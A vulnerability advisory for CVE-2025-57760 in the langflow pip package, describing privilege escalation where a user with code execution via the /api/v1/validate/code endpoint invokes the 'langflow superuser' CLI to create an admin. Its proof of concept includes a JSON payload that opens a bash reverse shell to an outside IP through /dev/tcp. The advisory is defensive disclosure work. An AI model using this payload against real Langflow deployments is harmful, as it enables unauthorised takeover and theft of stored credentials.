logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-57760 langflow

Package

Manager: pip
Name: langflow
Vulnerable Version: >=0 <=1.5.0

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00041 pctl0.11549

Details

Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE) This vulnerability was discovered by researchers at **Check Point**. We are sharing this report as part of a responsible disclosure process and are happy to assist in validation and remediation if needed. ### Summary A privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command **langflow superuser** to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account. ### Details Langflow's Docker image includes a CLI binary at /app/.venv/bin/langflow that exposes sensitive commands, including: `langflow superuser` This command allows creation of a new superuser without checking whether one already exists. When combined with code execution (e.g., via the authenticated **/api/v1/validate/code** endpoint), a low-privileged user can execute: `/app/.venv/bin/langflow superuser` inside the container, and elevate themselves to full superuser privileges. This effectively bypasses frontend role enforcement and backend user integrity, leading to full compromise of the Langflow application. ### PoC 1. Start container with LANGFLOW_ENABLE_AUTH set to True. 2. Visit http://localhost:7860 and sign up. (Your user will not be marked is_superuser.) <img width="1311" height="627" alt="image" src="https://github.com/user-attachments/assets/9b75bdc3-31ea-48c0-9e84-c2b168f404b3" /> 3. Exploit /api/v1/validate/code to get reverse shell Send an authenticated POST request: ``` { "code": "def foo(p=__import__('os').system(\"bash -c 'bash -i >& /dev/tcp/192.168.1.22/4444 0>&1'\")):\n pass" } ``` 4. Inside reverse shell, create superuser: <img width="731" height="217" alt="image" src="https://github.com/user-attachments/assets/cb8497c6-0d61-414e-afe2-69bbbaf55cbc" /> 5. Log into UI as new superuser: <img width="1262" height="532" alt="image" src="https://github.com/user-attachments/assets/1f0a713d-3d61-4aa4-a25b-58f4b58c061b" /> ### Impact - Privilege escalation to superuser — complete takeover of the Langflow instance - Access to all user data, flows, stored credentials, and configuration - Credential leakage — attacker can extract third-party API keys - Exposure of environment variables (inside docker container) - Ability to run additional Langflow instances via `langflow run` inside the container, which may lead to resource exhaustion (CPU, memory) and service degradation. - Full user management — superuser can delete other users, reset their passwords

Metadata

Created: 2025-08-25T16:21:04Z
Modified: 2025-08-25T16:21:04Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4gv9-mp8m-592r/GHSA-4gv9-mp8m-592r.json
CWE IDs: ["CWE-269"]
Alternative ID: GHSA-4gv9-mp8m-592r
Finding: F159
Auto approve: 1